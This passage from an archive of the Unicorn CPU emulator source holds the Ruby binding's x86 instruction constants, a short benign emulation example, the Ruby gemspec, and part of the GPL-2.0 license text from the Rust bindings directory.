UC_X86_INS_VMOVDQU32 = 937 UC_X86_INS_VMOVDQU64 = 938 UC_X86_INS_VMOVDQU8 = 939 UC_X86_INS_VMOVDQU = 940 UC_X86_INS_VMOVHLPS = 941 UC_X86_INS_VMOVHPD = 942 UC_X86_INS_VMOVHPS = 943 UC_X86_INS_VMOVLHPS = 944 UC_X86_INS_VMOVLPD = 945 UC_X86_INS_VMOVLPS = 946 UC_X86_INS_VMOVMSKPD = 947 UC_X86_INS_VMOVMSKPS = 948 UC_X86_INS_VMOVNTDQA = 949 UC_X86_INS_VMOVNTDQ = 950 UC_X86_INS_VMOVNTPD = 951 UC_X86_INS_VMOVNTPS = 952 UC_X86_INS_VMOVSD = 953 UC_X86_INS_VMOVSHDUP = 954 UC_X86_INS_VMOVSLDUP = 955 UC_X86_INS_VMOVSS = 956 UC_X86_INS_VMOVUPD = 957 UC_X86_INS_VMOVUPS = 958 UC_X86_INS_VMPSADBW = 959 UC_X86_INS_VMPTRLD = 960 UC_X86_INS_VMPTRST = 961 UC_X86_INS_VMREAD = 962 UC_X86_INS_VMRESUME = 963 UC_X86_INS_VMRUN = 964 UC_X86_INS_VMSAVE = 965 UC_X86_INS_VMULPD = 966 UC_X86_INS_VMULPS = 967 UC_X86_INS_VMULSD = 968 UC_X86_INS_VMULSS = 969 UC_X86_INS_VMWRITE = 970 UC_X86_INS_VMXOFF = 971 UC_X86_INS_VMXON = 972 UC_X86_INS_VPABSB = 973 UC_X86_INS_VPABSD = 974 UC_X86_INS_VPABSQ = 975 UC_X86_INS_VPABSW = 976 UC_X86_INS_VPACKSSDW = 977 UC_X86_INS_VPACKSSWB = 978 UC_X86_INS_VPACKUSDW = 979 UC_X86_INS_VPACKUSWB = 980 UC_X86_INS_VPADDB = 981 UC_X86_INS_VPADDD = 982 UC_X86_INS_VPADDQ = 983 UC_X86_INS_VPADDSB = 984 UC_X86_INS_VPADDSW = 985 UC_X86_INS_VPADDUSB = 986 UC_X86_INS_VPADDUSW = 987 UC_X86_INS_VPADDW = 988 UC_X86_INS_VPALIGNR = 989 UC_X86_INS_VPANDD = 990 UC_X86_INS_VPANDND = 991 UC_X86_INS_VPANDNQ = 992 UC_X86_INS_VPANDN = 993 UC_X86_INS_VPANDQ = 994 UC_X86_INS_VPAND = 995 UC_X86_INS_VPAVGB = 996 UC_X86_INS_VPAVGW = 997 UC_X86_INS_VPBLENDD = 998 UC_X86_INS_VPBLENDMB = 999 UC_X86_INS_VPBLENDMD = 1000 UC_X86_INS_VPBLENDMQ = 1001 UC_X86_INS_VPBLENDMW = 1002 UC_X86_INS_VPBLENDVB = 1003 UC_X86_INS_VPBLENDW = 1004 UC_X86_INS_VPBROADCASTB = 1005 UC_X86_INS_VPBROADCASTD = 1006 UC_X86_INS_VPBROADCASTMB2Q = 1007 UC_X86_INS_VPBROADCASTMW2D = 1008 UC_X86_INS_VPBROADCASTQ = 1009 UC_X86_INS_VPBROADCASTW = 1010 UC_X86_INS_VPCLMULQDQ = 1011 UC_X86_INS_VPCMOV = 1012 UC_X86_INS_VPCMPB = 1013 UC_X86_INS_VPCMPD = 1014 UC_X86_INS_VPCMPEQB = 1015 UC_X86_INS_VPCMPEQD = 1016 UC_X86_INS_VPCMPEQQ = 1017 UC_X86_INS_VPCMPEQW = 1018 UC_X86_INS_VPCMPESTRI = 1019 UC_X86_INS_VPCMPESTRM = 1020 UC_X86_INS_VPCMPGTB = 1021 UC_X86_INS_VPCMPGTD = 1022 UC_X86_INS_VPCMPGTQ = 1023 UC_X86_INS_VPCMPGTW = 1024 UC_X86_INS_VPCMPISTRI = 1025 UC_X86_INS_VPCMPISTRM = 1026 UC_X86_INS_VPCMPQ = 1027 UC_X86_INS_VPCMPUB = 1028 UC_X86_INS_VPCMPUD = 1029 UC_X86_INS_VPCMPUQ = 1030 UC_X86_INS_VPCMPUW = 1031 UC_X86_INS_VPCMPW = 1032 UC_X86_INS_VPCOMB = 1033 UC_X86_INS_VPCOMD = 1034 UC_X86_INS_VPCOMPRESSD = 1035 UC_X86_INS_VPCOMPRESSQ = 1036 UC_X86_INS_VPCOMQ = 1037 UC_X86_INS_VPCOMUB = 1038 UC_X86_INS_VPCOMUD = 1039 UC_X86_INS_VPCOMUQ = 1040 UC_X86_INS_VPCOMUW = 1041 
UC_X86_INS_VPCOMW = 1042 UC_X86_INS_VPCONFLICTD = 1043 UC_X86_INS_VPCONFLICTQ = 1044 UC_X86_INS_VPERM2F128 = 1045 UC_X86_INS_VPERM2I128 = 1046 UC_X86_INS_VPERMD = 1047 UC_X86_INS_VPERMI2D = 1048 UC_X86_INS_VPERMI2PD = 1049 UC_X86_INS_VPERMI2PS = 1050 UC_X86_INS_VPERMI2Q = 1051 UC_X86_INS_VPERMIL2PD = 1052 UC_X86_INS_VPERMIL2PS = 1053 UC_X86_INS_VPERMILPD = 1054 UC_X86_INS_VPERMILPS = 1055 UC_X86_INS_VPERMPD = 1056 UC_X86_INS_VPERMPS = 1057 UC_X86_INS_VPERMQ = 1058 UC_X86_INS_VPERMT2D = 1059 UC_X86_INS_VPERMT2PD = 1060 UC_X86_INS_VPERMT2PS = 1061 UC_X86_INS_VPERMT2Q = 1062 UC_X86_INS_VPEXPANDD = 1063 UC_X86_INS_VPEXPANDQ = 1064 UC_X86_INS_VPEXTRB = 1065 UC_X86_INS_VPEXTRD = 1066 UC_X86_INS_VPEXTRQ = 1067 UC_X86_INS_VPEXTRW = 1068 UC_X86_INS_VPGATHERDD = 1069 UC_X86_INS_VPGATHERDQ = 1070 UC_X86_INS_VPGATHERQD = 1071 UC_X86_INS_VPGATHERQQ = 1072 UC_X86_INS_VPHADDBD = 1073 UC_X86_INS_VPHADDBQ = 1074 UC_X86_INS_VPHADDBW = 1075 UC_X86_INS_VPHADDDQ = 1076 UC_X86_INS_VPHADDD = 1077 UC_X86_INS_VPHADDSW = 1078 UC_X86_INS_VPHADDUBD = 1079 UC_X86_INS_VPHADDUBQ = 1080 UC_X86_INS_VPHADDUBW = 1081 UC_X86_INS_VPHADDUDQ = 1082 UC_X86_INS_VPHADDUWD = 1083 UC_X86_INS_VPHADDUWQ = 1084 UC_X86_INS_VPHADDWD = 1085 UC_X86_INS_VPHADDWQ = 1086 UC_X86_INS_VPHADDW = 1087 UC_X86_INS_VPHMINPOSUW = 1088 UC_X86_INS_VPHSUBBW = 1089 UC_X86_INS_VPHSUBDQ = 1090 UC_X86_INS_VPHSUBD = 1091 UC_X86_INS_VPHSUBSW = 1092 UC_X86_INS_VPHSUBWD = 1093 UC_X86_INS_VPHSUBW = 1094 UC_X86_INS_VPINSRB = 1095 UC_X86_INS_VPINSRD = 1096 UC_X86_INS_VPINSRQ = 1097 UC_X86_INS_VPINSRW = 1098 UC_X86_INS_VPLZCNTD = 1099 UC_X86_INS_VPLZCNTQ = 1100 UC_X86_INS_VPMACSDD = 1101 UC_X86_INS_VPMACSDQH = 1102 UC_X86_INS_VPMACSDQL = 1103 UC_X86_INS_VPMACSSDD = 1104 UC_X86_INS_VPMACSSDQH = 1105 UC_X86_INS_VPMACSSDQL = 1106 UC_X86_INS_VPMACSSWD = 1107 UC_X86_INS_VPMACSSWW = 1108 UC_X86_INS_VPMACSWD = 1109 UC_X86_INS_VPMACSWW = 1110 UC_X86_INS_VPMADCSSWD = 1111 UC_X86_INS_VPMADCSWD = 1112 UC_X86_INS_VPMADDUBSW = 1113 UC_X86_INS_VPMADDWD = 1114 UC_X86_INS_VPMASKMOVD = 1115 UC_X86_INS_VPMASKMOVQ = 1116 UC_X86_INS_VPMAXSB = 1117 UC_X86_INS_VPMAXSD = 1118 UC_X86_INS_VPMAXSQ = 1119 UC_X86_INS_VPMAXSW = 1120 UC_X86_INS_VPMAXUB = 1121 UC_X86_INS_VPMAXUD = 1122 UC_X86_INS_VPMAXUQ = 1123 UC_X86_INS_VPMAXUW = 1124 UC_X86_INS_VPMINSB = 1125 UC_X86_INS_VPMINSD = 1126 UC_X86_INS_VPMINSQ = 1127 UC_X86_INS_VPMINSW = 1128 UC_X86_INS_VPMINUB = 1129 UC_X86_INS_VPMINUD = 1130 UC_X86_INS_VPMINUQ = 1131 UC_X86_INS_VPMINUW = 1132 UC_X86_INS_VPMOVDB = 1133 UC_X86_INS_VPMOVDW = 1134 UC_X86_INS_VPMOVM2B = 1135 UC_X86_INS_VPMOVM2D = 1136 UC_X86_INS_VPMOVM2Q = 1137 UC_X86_INS_VPMOVM2W = 1138 UC_X86_INS_VPMOVMSKB = 1139 UC_X86_INS_VPMOVQB = 1140 UC_X86_INS_VPMOVQD = 1141 UC_X86_INS_VPMOVQW = 1142 UC_X86_INS_VPMOVSDB = 1143 UC_X86_INS_VPMOVSDW = 1144 UC_X86_INS_VPMOVSQB = 1145 UC_X86_INS_VPMOVSQD = 1146 UC_X86_INS_VPMOVSQW = 1147 UC_X86_INS_VPMOVSXBD = 1148 UC_X86_INS_VPMOVSXBQ = 1149 UC_X86_INS_VPMOVSXBW = 1150 UC_X86_INS_VPMOVSXDQ = 1151 UC_X86_INS_VPMOVSXWD = 1152 UC_X86_INS_VPMOVSXWQ = 1153 UC_X86_INS_VPMOVUSDB = 1154 UC_X86_INS_VPMOVUSDW = 1155 UC_X86_INS_VPMOVUSQB = 1156 UC_X86_INS_VPMOVUSQD = 1157 UC_X86_INS_VPMOVUSQW = 1158 UC_X86_INS_VPMOVZXBD = 1159 UC_X86_INS_VPMOVZXBQ = 1160 UC_X86_INS_VPMOVZXBW = 1161 UC_X86_INS_VPMOVZXDQ = 1162 UC_X86_INS_VPMOVZXWD = 1163 UC_X86_INS_VPMOVZXWQ = 1164 UC_X86_INS_VPMULDQ = 1165 UC_X86_INS_VPMULHRSW = 1166 UC_X86_INS_VPMULHUW = 1167 UC_X86_INS_VPMULHW = 1168 UC_X86_INS_VPMULLD = 1169 UC_X86_INS_VPMULLQ = 1170 UC_X86_INS_VPMULLW = 1171 
UC_X86_INS_VPMULUDQ = 1172 UC_X86_INS_VPORD = 1173 UC_X86_INS_VPORQ = 1174 UC_X86_INS_VPOR = 1175 UC_X86_INS_VPPERM = 1176 UC_X86_INS_VPROTB = 1177 UC_X86_INS_VPROTD = 1178 UC_X86_INS_VPROTQ = 1179 UC_X86_INS_VPROTW = 1180 UC_X86_INS_VPSADBW = 1181 UC_X86_INS_VPSCATTERDD = 1182 UC_X86_INS_VPSCATTERDQ = 1183 UC_X86_INS_VPSCATTERQD = 1184 UC_X86_INS_VPSCATTERQQ = 1185 UC_X86_INS_VPSHAB = 1186 UC_X86_INS_VPSHAD = 1187 UC_X86_INS_VPSHAQ = 1188 UC_X86_INS_VPSHAW = 1189 UC_X86_INS_VPSHLB = 1190 UC_X86_INS_VPSHLD = 1191 UC_X86_INS_VPSHLQ = 1192 UC_X86_INS_VPSHLW = 1193 UC_X86_INS_VPSHUFB = 1194 UC_X86_INS_VPSHUFD = 1195 UC_X86_INS_VPSHUFHW = 1196 UC_X86_INS_VPSHUFLW = 1197 UC_X86_INS_VPSIGNB = 1198 UC_X86_INS_VPSIGND = 1199 UC_X86_INS_VPSIGNW = 1200 UC_X86_INS_VPSLLDQ = 1201 UC_X86_INS_VPSLLD = 1202 UC_X86_INS_VPSLLQ = 1203 UC_X86_INS_VPSLLVD = 1204 UC_X86_INS_VPSLLVQ = 1205 UC_X86_INS_VPSLLW = 1206 UC_X86_INS_VPSRAD = 1207 UC_X86_INS_VPSRAQ = 1208 UC_X86_INS_VPSRAVD = 1209 UC_X86_INS_VPSRAVQ = 1210 UC_X86_INS_VPSRAW = 1211 UC_X86_INS_VPSRLDQ = 1212 UC_X86_INS_VPSRLD = 1213 UC_X86_INS_VPSRLQ = 1214 UC_X86_INS_VPSRLVD = 1215 UC_X86_INS_VPSRLVQ = 1216 UC_X86_INS_VPSRLW = 1217 UC_X86_INS_VPSUBB = 1218 UC_X86_INS_VPSUBD = 1219 UC_X86_INS_VPSUBQ = 1220 UC_X86_INS_VPSUBSB = 1221 UC_X86_INS_VPSUBSW = 1222 UC_X86_INS_VPSUBUSB = 1223 UC_X86_INS_VPSUBUSW = 1224 UC_X86_INS_VPSUBW = 1225 UC_X86_INS_VPTESTMD = 1226 UC_X86_INS_VPTESTMQ = 1227 UC_X86_INS_VPTESTNMD = 1228 UC_X86_INS_VPTESTNMQ = 1229 UC_X86_INS_VPTEST = 1230 UC_X86_INS_VPUNPCKHBW = 1231 UC_X86_INS_VPUNPCKHDQ = 1232 UC_X86_INS_VPUNPCKHQDQ = 1233 UC_X86_INS_VPUNPCKHWD = 1234 UC_X86_INS_VPUNPCKLBW = 1235 UC_X86_INS_VPUNPCKLDQ = 1236 UC_X86_INS_VPUNPCKLQDQ = 1237 UC_X86_INS_VPUNPCKLWD = 1238 UC_X86_INS_VPXORD = 1239 UC_X86_INS_VPXORQ = 1240 UC_X86_INS_VPXOR = 1241 UC_X86_INS_VRCP14PD = 1242 UC_X86_INS_VRCP14PS = 1243 UC_X86_INS_VRCP14SD = 1244 UC_X86_INS_VRCP14SS = 1245 UC_X86_INS_VRCP28PD = 1246 UC_X86_INS_VRCP28PS = 1247 UC_X86_INS_VRCP28SD = 1248 UC_X86_INS_VRCP28SS = 1249 UC_X86_INS_VRCPPS = 1250 UC_X86_INS_VRCPSS = 1251 UC_X86_INS_VRNDSCALEPD = 1252 UC_X86_INS_VRNDSCALEPS = 1253 UC_X86_INS_VRNDSCALESD = 1254 UC_X86_INS_VRNDSCALESS = 1255 UC_X86_INS_VROUNDPD = 1256 UC_X86_INS_VROUNDPS = 1257 UC_X86_INS_VROUNDSD = 1258 UC_X86_INS_VROUNDSS = 1259 UC_X86_INS_VRSQRT14PD = 1260 UC_X86_INS_VRSQRT14PS = 1261 UC_X86_INS_VRSQRT14SD = 1262 UC_X86_INS_VRSQRT14SS = 1263 UC_X86_INS_VRSQRT28PD = 1264 UC_X86_INS_VRSQRT28PS = 1265 UC_X86_INS_VRSQRT28SD = 1266 UC_X86_INS_VRSQRT28SS = 1267 UC_X86_INS_VRSQRTPS = 1268 UC_X86_INS_VRSQRTSS = 1269 UC_X86_INS_VSCATTERDPD = 1270 UC_X86_INS_VSCATTERDPS = 1271 UC_X86_INS_VSCATTERPF0DPD = 1272 UC_X86_INS_VSCATTERPF0DPS = 1273 UC_X86_INS_VSCATTERPF0QPD = 1274 UC_X86_INS_VSCATTERPF0QPS = 1275 UC_X86_INS_VSCATTERPF1DPD = 1276 UC_X86_INS_VSCATTERPF1DPS = 1277 UC_X86_INS_VSCATTERPF1QPD = 1278 UC_X86_INS_VSCATTERPF1QPS = 1279 UC_X86_INS_VSCATTERQPD = 1280 UC_X86_INS_VSCATTERQPS = 1281 UC_X86_INS_VSHUFPD = 1282 UC_X86_INS_VSHUFPS = 1283 UC_X86_INS_VSQRTPD = 1284 UC_X86_INS_VSQRTPS = 1285 UC_X86_INS_VSQRTSD = 1286 UC_X86_INS_VSQRTSS = 1287 UC_X86_INS_VSTMXCSR = 1288 UC_X86_INS_VSUBPD = 1289 UC_X86_INS_VSUBPS = 1290 UC_X86_INS_VSUBSD = 1291 UC_X86_INS_VSUBSS = 1292 UC_X86_INS_VTESTPD = 1293 UC_X86_INS_VTESTPS = 1294 UC_X86_INS_VUNPCKHPD = 1295 UC_X86_INS_VUNPCKHPS = 1296 UC_X86_INS_VUNPCKLPD = 1297 UC_X86_INS_VUNPCKLPS = 1298 UC_X86_INS_VZEROALL = 1299 UC_X86_INS_VZEROUPPER = 1300 UC_X86_INS_WAIT = 1301 UC_X86_INS_WBINVD = 1302 
    UC_X86_INS_WRFSBASE = 1303
    UC_X86_INS_WRGSBASE = 1304
    UC_X86_INS_WRMSR = 1305
    UC_X86_INS_XABORT = 1306
    UC_X86_INS_XACQUIRE = 1307
    UC_X86_INS_XBEGIN = 1308
    UC_X86_INS_XCHG = 1309
    UC_X86_INS_XCRYPTCBC = 1310
    UC_X86_INS_XCRYPTCFB = 1311
    UC_X86_INS_XCRYPTCTR = 1312
    UC_X86_INS_XCRYPTECB = 1313
    UC_X86_INS_XCRYPTOFB = 1314
    UC_X86_INS_XEND = 1315
    UC_X86_INS_XGETBV = 1316
    UC_X86_INS_XLATB = 1317
    UC_X86_INS_XRELEASE = 1318
    UC_X86_INS_XRSTOR = 1319
    UC_X86_INS_XRSTOR64 = 1320
    UC_X86_INS_XRSTORS = 1321
    UC_X86_INS_XRSTORS64 = 1322
    UC_X86_INS_XSAVE = 1323
    UC_X86_INS_XSAVE64 = 1324
    UC_X86_INS_XSAVEC = 1325
    UC_X86_INS_XSAVEC64 = 1326
    UC_X86_INS_XSAVEOPT = 1327
    UC_X86_INS_XSAVEOPT64 = 1328
    UC_X86_INS_XSAVES = 1329
    UC_X86_INS_XSAVES64 = 1330
    UC_X86_INS_XSETBV = 1331
    UC_X86_INS_XSHA1 = 1332
    UC_X86_INS_XSHA256 = 1333
    UC_X86_INS_XSTORE = 1334
    UC_X86_INS_XTEST = 1335
    UC_X86_INS_FDISI8087_NOP = 1336
    UC_X86_INS_FENI8087_NOP = 1337
    UC_X86_INS_ENDING = 1338
end
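Taken together with unicorn_const.rb, the x86 constants above are enough to drive the emulator from Ruby. A minimal sketch, assuming the gem and its native extension are installed and expose the Uc class with mem_map/mem_write/reg_write/emu_start/reg_read as in the project's Ruby samples; treat the exact class and method names here as assumptions rather than a reference:

require 'unicorn_engine'
require 'unicorn_engine/unicorn_const'
require 'unicorn_engine/x86_const'
include UnicornEngine

X86_CODE32 = "\x41\x4a"  # INC ecx; DEC edx
ADDRESS = 0x1000000      # arbitrary base address for the emulated code

mu = Uc.new(UC_ARCH_X86, UC_MODE_32)
mu.mem_map(ADDRESS, 2 * 1024 * 1024)   # map 2 MB for code and data
mu.mem_write(ADDRESS, X86_CODE32)
mu.reg_write(UC_X86_REG_ECX, 0x1234)
mu.reg_write(UC_X86_REG_EDX, 0x7890)
mu.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize)
printf("ECX = 0x%x\n", mu.reg_read(UC_X86_REG_ECX))  # expect 0x1235
printf("EDX = 0x%x\n", mu.reg_read(UC_X86_REG_EDX))  # expect 0x788f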
"unicorn-engine" spec.version = Unicorn::VERSION spec.authors = ["Sascha Schirra"] spec.email = ["sashs@scoding.de"] spec.license = 'GPL-2.0' spec.summary = %q{Ruby binding for Unicorn-Engine} spec.description = %q{Ruby binding for Unicorn-Engine <unicorn-engine.org>} spec.homepage = "https://unicorn-engine.org" spec.files = Dir["lib/unicorn_engine/*.rb"] + Dir["ext/unicorn.c"] + Dir["ext/unicorn.h"] + Dir["ext/types.h"] + Dir["ext/extconf.rb"] spec.require_paths = ["lib","ext"] spec.extensions = ["ext/extconf.rb"] spec.add_development_dependency "bundler", "~> 1.11" spec.add_development_dependency "rake", "~> 10.0" end ��������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015776�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/COPYING�����������������������������������������������������������������0000664�0000000�0000000�00000043110�14675241067�0017030�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. 
And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. 
c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. 
If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. 
If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. 
<one line to give the program's name and a brief idea of what it does.> Copyright (C) <year> <name of author> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a 